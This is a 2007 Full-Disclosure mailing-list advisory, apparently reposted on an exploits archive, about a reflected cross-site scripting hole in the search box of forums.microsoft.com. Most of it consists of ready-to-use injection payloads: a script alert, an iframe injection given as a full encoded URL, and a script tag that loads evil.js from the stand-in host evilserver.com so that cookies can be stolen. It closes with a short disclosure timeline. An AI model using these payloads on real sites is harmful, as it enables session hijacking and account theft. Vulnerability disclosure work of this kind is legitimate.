Home / exploits msforums-xss.txt
Posted on 07 September 2007
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 XSS in http://forums.microsoft.com/ - could lead to cookie/account stealing, information disclosure and more... Start e.g. here: http://forums.microsoft.com/Genuine/default.aspx?SiteID=25 Enter one of the following examples in searchbox of forum, the second searchbox on page (not "Search Microsoft.com for"): Example 1 "><script>alert("xss")</script><x x=" Example 2 "><br><iframe width=700 height=400 src=http://google.com/><x x=" Example 2 as full URL: All in one line: http://forums.microsoft.com/Genuine/Search/Search.aspx?words=%22%3e% 3cbr%3e%3ciframe+width%3d700+height%3d400+src%3dhttp%3a%2f%2fgoogle. com%2f%3e%3cx+x%3d%22&localechoice=9&SiteID=25&searchscope=allforums Remove linebreaks: http://forums.microsoft.com/Genuine/Search/Search.aspx?words=%22 %3e%3cbr%3e%3ciframe+width%3d700+height%3d400+src%3dhttp%3a%2f%2 fgoogle.com%2f%3e%3cx+x%3d%22&localechoice=9&SiteID=25&searchsco pe=allforums Example 3 "><script src=http://evilserver.com/evil.js></script><x x=" The length of searchstring is limited, but we can include scripts from evilserver.com, so that doesn't matter at all. Example 3 has been added after disclosure to MS. Disclosure timeline: 04-Sep-2007: secure-at-microsoft.com (no response at all) 06-Sep-2007: public disclosure -----BEGIN PGP SIGNATURE----- Note: This signature can be verified at https://www.hushtools.com/verify Charset: UTF8 Version: Hush 2.5 wpwEAQECAAYFAkbf9uwACgkQFHZ6LRIhCQUcDAP/YuFdpIRkC3QgEFzjoM59rgW8CZD1 YsDbO2bWeKUzEFAoRqRzhvNhMax3/QEFi3Z61DoRANbvrYumkPZ7cbexgbDzyfqEegVj bjU/1QITCJMYb7utgg1w3wX5WTXKa6mr19bhVou/gHKmYs+ddPL+aIR1Dji32M881euk hUMhBGY= =R376 -----END PGP SIGNATURE----- -- Tired of renting? Click here to buy a home without breaking the bank. Get an interest only loan. http://tagline.hushmail.com/fc/Ioyw6h4dQLQgODJBWkHuQkD2UTaSLwrDsAymv6lIlffqOET7ql7qHG/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/